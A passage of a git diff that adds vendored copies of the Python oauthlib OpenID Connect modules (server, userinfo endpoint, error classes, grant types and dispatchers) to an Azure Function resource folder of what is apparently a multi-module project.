+""" +from oauthlib.oauth2.rfc6749.endpoints import ( + AuthorizationEndpoint, IntrospectEndpoint, ResourceEndpoint, + RevocationEndpoint, TokenEndpoint, +) +from oauthlib.oauth2.rfc6749.grant_types import ( + AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant, + ClientCredentialsGrant, ImplicitGrant as OAuth2ImplicitGrant, + RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant, +) +from oauthlib.oauth2.rfc6749.tokens import BearerToken + +from ..grant_types import AuthorizationCodeGrant, HybridGrant, ImplicitGrant +from ..grant_types.dispatchers import ( + AuthorizationCodeGrantDispatcher, AuthorizationTokenGrantDispatcher, + ImplicitTokenGrantDispatcher, +) +from ..tokens import JWTToken +from .userinfo import UserInfoEndpoint + + +class Server(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint, + ResourceEndpoint, RevocationEndpoint, UserInfoEndpoint): + + """An all-in-one endpoint featuring all four major grant types.""" + + def __init__(self, request_validator, token_expires_in=None, + token_generator=None, refresh_token_generator=None, + *args, **kwargs): + """Construct a new all-grants-in-one server. + + :param request_validator: An implementation of + oauthlib.oauth2.RequestValidator. + :param token_expires_in: An int or a function to generate a token + expiration offset (in seconds) given a + oauthlib.common.Request object. + :param token_generator: A function to generate a token from a request. + :param refresh_token_generator: A function to generate a token from a + request for the refresh token. + :param kwargs: Extra parameters to pass to authorization-, + token-, resource-, and revocation-endpoint constructors. + """ + self.auth_grant = OAuth2AuthorizationCodeGrant(request_validator) + self.implicit_grant = OAuth2ImplicitGrant(request_validator) + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.openid_connect_auth = AuthorizationCodeGrant(request_validator) + self.openid_connect_implicit = ImplicitGrant(request_validator) + self.openid_connect_hybrid = HybridGrant(request_validator) + + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + self.jwt = JWTToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + self.auth_grant_choice = AuthorizationCodeGrantDispatcher(default_grant=self.auth_grant, oidc_grant=self.openid_connect_auth) + self.implicit_grant_choice = ImplicitTokenGrantDispatcher(default_grant=self.implicit_grant, oidc_grant=self.openid_connect_implicit) + + # See http://openid.net/specs/oauth-v2-multiple-response-types-1_0.html#Combinations for valid combinations + # internally our AuthorizationEndpoint will ensure they can appear in any order for any valid combination + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={ + 'code': self.auth_grant_choice, + 'token': self.implicit_grant_choice, + 'id_token': self.openid_connect_implicit, + 'id_token token': self.openid_connect_implicit, + 'code token': self.openid_connect_hybrid, + 'code id_token': self.openid_connect_hybrid, + 'code id_token token': self.openid_connect_hybrid, + 'none': self.auth_grant + }, + default_token_type=self.bearer) + + self.token_grant_choice = AuthorizationTokenGrantDispatcher(request_validator, default_grant=self.auth_grant, oidc_grant=self.openid_connect_auth) + + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.token_grant_choice, + 'password': self.password_grant, + 'client_credentials': self.credentials_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer, 'JWT': self.jwt}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + UserInfoEndpoint.__init__(self, request_validator) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py new file mode 100644 index 0000000..34568d5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py @@ -0,0 +1,99 @@ +""" +oauthlib.openid.connect.core.endpoints.userinfo +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of userinfo endpoint. +""" +import json +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import errors +from oauthlib.oauth2.rfc6749.endpoints.base import ( + BaseEndpoint, catch_errors_and_unavailability, +) +from oauthlib.oauth2.rfc6749.tokens import BearerToken + +log = logging.getLogger(__name__) + + +class UserInfoEndpoint(BaseEndpoint): + """Authorizes access to userinfo resource. + """ + def __init__(self, request_validator): + self.bearer = BearerToken(request_validator, None, None, None) + self.request_validator = request_validator + BaseEndpoint.__init__(self) + + @catch_errors_and_unavailability + def create_userinfo_response(self, uri, http_method='GET', body=None, headers=None): + """Validate BearerToken and return userinfo from RequestValidator + + The UserInfo Endpoint MUST return a + content-type header to indicate which format is being returned. The + content-type of the HTTP response MUST be application/json if the + response body is a text JSON object; the response body SHOULD be encoded + using UTF-8. + """ + request = Request(uri, http_method, body, headers) + request.scopes = ["openid"] + self.validate_userinfo_request(request) + + claims = self.request_validator.get_userinfo_claims(request) + if claims is None: + log.error('Userinfo MUST have claims for %r.', request) + raise errors.ServerError(status_code=500) + + if isinstance(claims, dict): + resp_headers = { + 'Content-Type': 'application/json' + } + if "sub" not in claims: + log.error('Userinfo MUST have "sub" for %r.', request) + raise errors.ServerError(status_code=500) + body = json.dumps(claims) + elif isinstance(claims, str): + resp_headers = { + 'Content-Type': 'application/jwt' + } + body = claims + else: + log.error('Userinfo return unknown response for %r.', request) + raise errors.ServerError(status_code=500) + log.debug('Userinfo access valid for %r.', request) + return resp_headers, body, 200 + + def validate_userinfo_request(self, request): + """Ensure the request is valid. + + 5.3.1. UserInfo Request + The Client sends the UserInfo Request using either HTTP GET or HTTP + POST. The Access Token obtained from an OpenID Connect Authentication + Request MUST be sent as a Bearer Token, per Section 2 of OAuth 2.0 + Bearer Token Usage [RFC6750]. + + It is RECOMMENDED that the request use the HTTP GET method and the + Access Token be sent using the Authorization header field. + + The following is a non-normative example of a UserInfo Request: + + GET /userinfo HTTP/1.1 + Host: server.example.com + Authorization: Bearer SlAV32hkKG + + 5.3.3. UserInfo Error Response + When an error condition occurs, the UserInfo Endpoint returns an Error + Response as defined in Section 3 of OAuth 2.0 Bearer Token Usage + [RFC6750]. (HTTP errors unrelated to RFC 6750 are returned to the User + Agent using the appropriate HTTP status code.) + + The following is a non-normative example of a UserInfo Error Response: + + HTTP/1.1 401 Unauthorized + WWW-Authenticate: Bearer error="invalid_token", + error_description="The Access Token expired" + """ + if not self.bearer.validate_request(request): + raise errors.InvalidTokenError() + if "openid" not in request.scopes: + raise errors.InsufficientScopeError() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py new file mode 100644 index 0000000..eb3839d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py @@ -0,0 +1,149 @@ +""" +oauthlib.oauth2.rfc6749.errors +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Error used both by OAuth 2 clients and providers to represent the spec +defined error responses for all four core grant types. +""" +from oauthlib.oauth2.rfc6749.errors import FatalClientError, OAuth2Error + + +class FatalOpenIDClientError(FatalClientError): + pass + + +class OpenIDClientError(OAuth2Error): + pass + + +class InteractionRequired(OpenIDClientError): + """ + The Authorization Server requires End-User interaction to proceed. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User interaction. + """ + error = 'interaction_required' + status_code = 401 + + +class LoginRequired(OpenIDClientError): + """ + The Authorization Server requires End-User authentication. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User authentication. + """ + error = 'login_required' + status_code = 401 + + +class AccountSelectionRequired(OpenIDClientError): + """ + The End-User is REQUIRED to select a session at the Authorization Server. + + The End-User MAY be authenticated at the Authorization Server with + different associated accounts, but the End-User did not select a session. + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface to prompt for a session to + use. + """ + error = 'account_selection_required' + + +class ConsentRequired(OpenIDClientError): + """ + The Authorization Server requires End-User consent. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User consent. + """ + error = 'consent_required' + status_code = 401 + + +class InvalidRequestURI(OpenIDClientError): + """ + The request_uri in the Authorization Request returns an error or + contains invalid data. + """ + error = 'invalid_request_uri' + description = 'The request_uri in the Authorization Request returns an ' \ + 'error or contains invalid data.' + + +class InvalidRequestObject(OpenIDClientError): + """ + The request parameter contains an invalid Request Object. + """ + error = 'invalid_request_object' + description = 'The request parameter contains an invalid Request Object.' + + +class RequestNotSupported(OpenIDClientError): + """ + The OP does not support use of the request parameter. + """ + error = 'request_not_supported' + description = 'The request parameter is not supported.' + + +class RequestURINotSupported(OpenIDClientError): + """ + The OP does not support use of the request_uri parameter. + """ + error = 'request_uri_not_supported' + description = 'The request_uri parameter is not supported.' + + +class RegistrationNotSupported(OpenIDClientError): + """ + The OP does not support use of the registration parameter. + """ + error = 'registration_not_supported' + description = 'The registration parameter is not supported.' + + +class InvalidTokenError(OAuth2Error): + """ + The access token provided is expired, revoked, malformed, or + invalid for other reasons. The resource SHOULD respond with + the HTTP 401 (Unauthorized) status code. The client MAY + request a new access token and retry the protected resource + request. + """ + error = 'invalid_token' + status_code = 401 + description = ("The access token provided is expired, revoked, malformed, " + "or invalid for other reasons.") + + +class InsufficientScopeError(OAuth2Error): + """ + The request requires higher privileges than provided by the + access token. The resource server SHOULD respond with the HTTP + 403 (Forbidden) status code and MAY include the "scope" + attribute with the scope necessary to access the protected + resource. + """ + error = 'insufficient_scope' + status_code = 403 + description = ("The request requires higher privileges than provided by " + "the access token.") + + +def raise_from_error(error, params=None): + import inspect + import sys + kwargs = { + 'description': params.get('error_description'), + 'uri': params.get('error_uri'), + 'state': params.get('state') + } + for _, cls in inspect.getmembers(sys.modules[__name__], inspect.isclass): + if cls.error == error: + raise cls(**kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py new file mode 100644 index 0000000..64dd51d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py @@ -0,0 +1,13 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +from .authorization_code import AuthorizationCodeGrant +from .base import GrantTypeBase +from .dispatchers import ( + AuthorizationCodeGrantDispatcher, AuthorizationTokenGrantDispatcher, + ImplicitTokenGrantDispatcher, +) +from .hybrid import HybridGrant +from .implicit import ImplicitGrant +from .refresh_token import RefreshTokenGrant diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..bea49bc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc new file mode 100644 index 0000000..3b5e096 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..827f8da Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc new file mode 100644 index 0000000..a432f37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc new file mode 100644 index 0000000..8f61249 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc new file mode 100644 index 0000000..e0055c1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc new file mode 100644 index 0000000..34ff8c9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py new file mode 100644 index 0000000..8a50421 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py @@ -0,0 +1,43 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.grant_types.authorization_code import ( + AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant, +) + +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class AuthorizationCodeGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.proxy_target = OAuth2AuthorizationCodeGrant( + request_validator=request_validator, **kwargs) + self.custom_validators.post_auth.append( + self.openid_authorization_validator) + self.register_token_modifier(self.add_id_token) + + def add_id_token(self, token, token_handler, request): + """ + Construct an initial version of id_token, and let the + request_validator sign or encrypt it. + + The authorization_code version of this method is used to + retrieve the nonce accordingly to the code storage. + """ + # Treat it as normal OAuth 2 auth code request if openid is not present + if not request.scopes or 'openid' not in request.scopes: + return token + + nonce = self.request_validator.get_authorization_code_nonce( + request.client_id, + request.code, + request.redirect_uri, + request + ) + return super().add_id_token(token, token_handler, request, nonce=nonce) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py new file mode 100644 index 0000000..c9df326 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py @@ -0,0 +1,327 @@ +import base64 +import hashlib +import logging +import time +from json import loads + +from oauthlib.oauth2.rfc6749.errors import ( + ConsentRequired, InvalidRequestError, LoginRequired, +) + + +log = logging.getLogger(__name__) + + +class GrantTypeBase: + + # Just proxy the majority of method calls through to the + # proxy_target grant type handler, which will usually be either + # the standard OAuth2 AuthCode or Implicit grant types. + def __getattr__(self, attr): + return getattr(self.proxy_target, attr) + + def __setattr__(self, attr, value): + proxied_attrs = {'refresh_token', 'response_types'} + if attr in proxied_attrs: + setattr(self.proxy_target, attr, value) + else: + super(OpenIDConnectBase, self).__setattr__(attr, value) + + def validate_authorization_request(self, request): + """Validates the OpenID Connect authorization request parameters. + + :returns: (list of scopes, dict of request info) + """ + return self.proxy_target.validate_authorization_request(request) + + def _inflate_claims(self, request): + # this may be called multiple times in a single request so make sure we only de-serialize the claims once + if request.claims and not isinstance(request.claims, dict): + # specific claims are requested during the Authorization Request and may be requested for inclusion + # in either the id_token or the UserInfo endpoint response + # see http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter + try: + request.claims = loads(request.claims) + except Exception as ex: + raise InvalidRequestError(description="Malformed claims parameter", + uri="http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter") + + def id_token_hash(self, value, hashfunc=hashlib.sha256): + """ + Its value is the base64url encoding of the left-most half of the + hash of the octets of the ASCII representation of the access_token + value, where the hash algorithm used is the hash algorithm used in + the alg Header Parameter of the ID Token's JOSE Header. + + For instance, if the alg is RS256, hash the access_token value + with SHA-256, then take the left-most 128 bits and + base64url-encode them. + For instance, if the alg is HS512, hash the code value with + SHA-512, then take the left-most 256 bits and base64url-encode + them. The c_hash value is a case-sensitive string. + + Example of hash from OIDC specification (bound to a JWS using RS256): + + code: + Qcb0Orv1zh30vL1MPRsbm-diHiMwcLyZvn1arpZv-Jxf_11jnpEX3Tgfvk + + c_hash: + LDktKdoQak3Pk0cnXxCltA + """ + digest = hashfunc(value.encode()).digest() + left_most = len(digest) // 2 + return base64.urlsafe_b64encode(digest[:left_most]).decode().rstrip("=") + + def add_id_token(self, token, token_handler, request, nonce=None): + """ + Construct an initial version of id_token, and let the + request_validator sign or encrypt it. + + The initial version can contain the fields below, accordingly + to the spec: + - aud + - iat + - nonce + - at_hash + - c_hash + """ + # Treat it as normal OAuth 2 auth code request if openid is not present + if not request.scopes or 'openid' not in request.scopes: + return token + + # Only add an id token on auth/token step if asked for. + if request.response_type and 'id_token' not in request.response_type: + return token + + # Implementation mint its own id_token without help. + id_token = self.request_validator.get_id_token(token, token_handler, request) + if id_token: + token['id_token'] = id_token + return token + + # Fallback for asking some help from oauthlib framework. + # Start with technicals fields bound to the specification. + id_token = {} + id_token['aud'] = request.client_id + id_token['iat'] = int(time.time()) + + # nonce is REQUIRED when response_type value is: + # - id_token token (Implicit) + # - id_token (Implicit) + # - code id_token (Hybrid) + # - code id_token token (Hybrid) + # + # nonce is OPTIONAL when response_type value is: + # - code (Authorization Code) + # - code token (Hybrid) + if nonce is not None: + id_token["nonce"] = nonce + + # at_hash is REQUIRED when response_type value is: + # - id_token token (Implicit) + # - code id_token token (Hybrid) + # + # at_hash is OPTIONAL when: + # - code (Authorization code) + # - code id_token (Hybrid) + # - code token (Hybrid) + # + # at_hash MAY NOT be used when: + # - id_token (Implicit) + if "access_token" in token: + id_token["at_hash"] = self.id_token_hash(token["access_token"]) + + # c_hash is REQUIRED when response_type value is: + # - code id_token (Hybrid) + # - code id_token token (Hybrid) + # + # c_hash is OPTIONAL for others. + if "code" in token: + id_token["c_hash"] = self.id_token_hash(token["code"]) + + # Call request_validator to complete/sign/encrypt id_token + token['id_token'] = self.request_validator.finalize_id_token(id_token, token, token_handler, request) + + return token + + def openid_authorization_validator(self, request): + """Perform OpenID Connect specific authorization request validation. + + nonce + OPTIONAL. String value used to associate a Client session with + an ID Token, and to mitigate replay attacks. The value is + passed through unmodified from the Authentication Request to + the ID Token. Sufficient entropy MUST be present in the nonce + values used to prevent attackers from guessing values + + display + OPTIONAL. ASCII string value that specifies how the + Authorization Server displays the authentication and consent + user interface pages to the End-User. The defined values are: + + page - The Authorization Server SHOULD display the + authentication and consent UI consistent with a full User + Agent page view. If the display parameter is not specified, + this is the default display mode. + + popup - The Authorization Server SHOULD display the + authentication and consent UI consistent with a popup User + Agent window. The popup User Agent window should be of an + appropriate size for a login-focused dialog and should not + obscure the entire window that it is popping up over. + + touch - The Authorization Server SHOULD display the + authentication and consent UI consistent with a device that + leverages a touch interface. + + wap - The Authorization Server SHOULD display the + authentication and consent UI consistent with a "feature + phone" type display. + + The Authorization Server MAY also attempt to detect the + capabilities of the User Agent and present an appropriate + display. + + prompt + OPTIONAL. Space delimited, case sensitive list of ASCII string + values that specifies whether the Authorization Server prompts + the End-User for reauthentication and consent. The defined + values are: + + none - The Authorization Server MUST NOT display any + authentication or consent user interface pages. An error is + returned if an End-User is not already authenticated or the + Client does not have pre-configured consent for the + requested Claims or does not fulfill other conditions for + processing the request. The error code will typically be + login_required, interaction_required, or another code + defined in Section 3.1.2.6. This can be used as a method to + check for existing authentication and/or consent. + + login - The Authorization Server SHOULD prompt the End-User + for reauthentication. If it cannot reauthenticate the + End-User, it MUST return an error, typically + login_required. + + consent - The Authorization Server SHOULD prompt the + End-User for consent before returning information to the + Client. If it cannot obtain consent, it MUST return an + error, typically consent_required. + + select_account - The Authorization Server SHOULD prompt the + End-User to select a user account. This enables an End-User + who has multiple accounts at the Authorization Server to + select amongst the multiple accounts that they might have + current sessions for. If it cannot obtain an account + selection choice made by the End-User, it MUST return an + error, typically account_selection_required. + + The prompt parameter can be used by the Client to make sure + that the End-User is still present for the current session or + to bring attention to the request. If this parameter contains + none with any other value, an error is returned. + + max_age + OPTIONAL. Maximum Authentication Age. Specifies the allowable + elapsed time in seconds since the last time the End-User was + actively authenticated by the OP. If the elapsed time is + greater than this value, the OP MUST attempt to actively + re-authenticate the End-User. (The max_age request parameter + corresponds to the OpenID 2.0 PAPE [OpenID.PAPE] max_auth_age + request parameter.) When max_age is used, the ID Token returned + MUST include an auth_time Claim Value. + + ui_locales + OPTIONAL. End-User's preferred languages and scripts for the + user interface, represented as a space-separated list of BCP47 + [RFC5646] language tag values, ordered by preference. For + instance, the value "fr-CA fr en" represents a preference for + French as spoken in Canada, then French (without a region + designation), followed by English (without a region + designation). An error SHOULD NOT result if some or all of the + requested locales are not supported by the OpenID Provider. + + id_token_hint + OPTIONAL. ID Token previously issued by the Authorization + Server being passed as a hint about the End-User's current or + past authenticated session with the Client. If the End-User + identified by the ID Token is logged in or is logged in by the + request, then the Authorization Server returns a positive + response; otherwise, it SHOULD return an error, such as + login_required. When possible, an id_token_hint SHOULD be + present when prompt=none is used and an invalid_request error + MAY be returned if it is not; however, the server SHOULD + respond successfully when possible, even if it is not present. + The Authorization Server need not be listed as an audience of + the ID Token when it is used as an id_token_hint value. If the + ID Token received by the RP from the OP is encrypted, to use it + as an id_token_hint, the Client MUST decrypt the signed ID + Token contained within the encrypted ID Token. The Client MAY + re-encrypt the signed ID token to the Authentication Server + using a key that enables the server to decrypt the ID Token, + and use the re-encrypted ID token as the id_token_hint value. + + login_hint + OPTIONAL. Hint to the Authorization Server about the login + identifier the End-User might use to log in (if necessary). + This hint can be used by an RP if it first asks the End-User + for their e-mail address (or other identifier) and then wants + to pass that value as a hint to the discovered authorization + service. It is RECOMMENDED that the hint value match the value + used for discovery. This value MAY also be a phone number in + the format specified for the phone_number Claim. The use of + this parameter is left to the OP's discretion. + + acr_values + OPTIONAL. Requested Authentication Context Class Reference + values. Space-separated string that specifies the acr values + that the Authorization Server is being requested to use for + processing this Authentication Request, with the values + appearing in order of preference. The Authentication Context + Class satisfied by the authentication performed is returned as + the acr Claim Value, as specified in Section 2. The acr Claim + is requested as a Voluntary Claim by this parameter. + """ + + # Treat it as normal OAuth 2 auth code request if openid is not present + if not request.scopes or 'openid' not in request.scopes: + return {} + + prompt = request.prompt if request.prompt else [] + if hasattr(prompt, 'split'): + prompt = prompt.strip().split() + prompt = set(prompt) + + if 'none' in prompt: + + if len(prompt) > 1: + msg = "Prompt none is mutually exclusive with other values." + raise InvalidRequestError(request=request, description=msg) + + if not self.request_validator.validate_silent_login(request): + raise LoginRequired(request=request) + + if not self.request_validator.validate_silent_authorization(request): + raise ConsentRequired(request=request) + + self._inflate_claims(request) + + if not self.request_validator.validate_user_match( + request.id_token_hint, request.scopes, request.claims, request): + msg = "Session user does not match client supplied user." + raise LoginRequired(request=request, description=msg) + + request_info = { + 'display': request.display, + 'nonce': request.nonce, + 'prompt': prompt, + 'ui_locales': request.ui_locales.split() if request.ui_locales else [], + 'id_token_hint': request.id_token_hint, + 'login_hint': request.login_hint, + 'claims': request.claims + } + + return request_info + + +OpenIDConnectBase = GrantTypeBase diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py new file mode 100644 index 0000000..7859eaa --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/dispatchers.py @@ -0,0 +1,101 @@ +import logging + +log = logging.getLogger(__name__) + + +class Dispatcher: + default_grant = None + oidc_grant = None + + +class AuthorizationCodeGrantDispatcher(Dispatcher): + """ + This is an adapter class that will route simple Authorization Code + requests, those that have `response_type=code` and a scope including + `openid` to either the `default_grant` or the `oidc_grant` based on + the scopes requested. + """ + def __init__(self, default_grant=None, oidc_grant=None): + self.default_grant = default_grant + self.oidc_grant = oidc_grant + + def _handler_for_request(self, request): + handler = self.default_grant + + if request.scopes and "openid" in request.scopes: + handler = self.oidc_grant + + log.debug('Selecting handler for request %r.', handler) + return handler + + def create_authorization_response(self, request, token_handler): + """Read scope and route to the designated handler.""" + return self._handler_for_request(request).create_authorization_response(request, token_handler) + + def validate_authorization_request(self, request): + """Read scope and route to the designated handler.""" + return self._handler_for_request(request).validate_authorization_request(request) + + +class ImplicitTokenGrantDispatcher(Dispatcher): + """ + This is an adapter class that will route simple Authorization + requests, those that have `id_token` in `response_type` and a scope + including `openid` to either the `default_grant` or the `oidc_grant` + based on the scopes requested. + """ + def __init__(self, default_grant=None, oidc_grant=None): + self.default_grant = default_grant + self.oidc_grant = oidc_grant + + def _handler_for_request(self, request): + handler = self.default_grant + + if request.scopes and "openid" in request.scopes and 'id_token' in request.response_type: + handler = self.oidc_grant + + log.debug('Selecting handler for request %r.', handler) + return handler + + def create_authorization_response(self, request, token_handler): + """Read scope and route to the designated handler.""" + return self._handler_for_request(request).create_authorization_response(request, token_handler) + + def validate_authorization_request(self, request): + """Read scope and route to the designated handler.""" + return self._handler_for_request(request).validate_authorization_request(request) + + +class AuthorizationTokenGrantDispatcher(Dispatcher): + """ + This is an adapter class that will route simple Token requests, those that authorization_code have a scope + including 'openid' to either the default_grant or the oidc_grant based on the scopes requested. + """ + def __init__(self, request_validator, default_grant=None, oidc_grant=None): + self.default_grant = default_grant + self.oidc_grant = oidc_grant + self.request_validator = request_validator + + def _handler_for_request(self, request): + handler = self.default_grant + scopes = () + parameters = dict(request.decoded_body) + client_id = parameters.get('client_id', None) + code = parameters.get('code', None) + redirect_uri = parameters.get('redirect_uri', None) + + # If code is not pressent fallback to `default_grant` which will + # raise an error for the missing `code` in `create_token_response` step. + if code: + scopes = self.request_validator.get_authorization_code_scopes(client_id, code, redirect_uri, request) + + if 'openid' in scopes: + handler = self.oidc_grant + + log.debug('Selecting handler for request %r.', handler) + return handler + + def create_token_response(self, request, token_handler): + """Read scope and route to the designated handler.""" + handler = self._handler_for_request(request) + return handler.create_token_response(request, token_handler) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py new file mode 100644 index 0000000..e72f38e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/hybrid.py @@ -0,0 +1,63 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.errors import InvalidRequestError +from oauthlib.oauth2.rfc6749.grant_types.authorization_code import ( + AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant, +) + +from ..request_validator import RequestValidator +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class HybridGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.request_validator = request_validator or RequestValidator() + + self.proxy_target = OAuth2AuthorizationCodeGrant( + request_validator=request_validator, **kwargs) + # All hybrid response types should be fragment-encoded. + self.proxy_target.default_response_mode = "fragment" + self.register_response_type('code id_token') + self.register_response_type('code token') + self.register_response_type('code id_token token') + self.custom_validators.post_auth.append( + self.openid_authorization_validator) + # Hybrid flows can return the id_token from the authorization + # endpoint as part of the 'code' response + self.register_code_modifier(self.add_token) + self.register_code_modifier(self.add_id_token) + self.register_token_modifier(self.add_id_token) + + def add_id_token(self, token, token_handler, request): + return 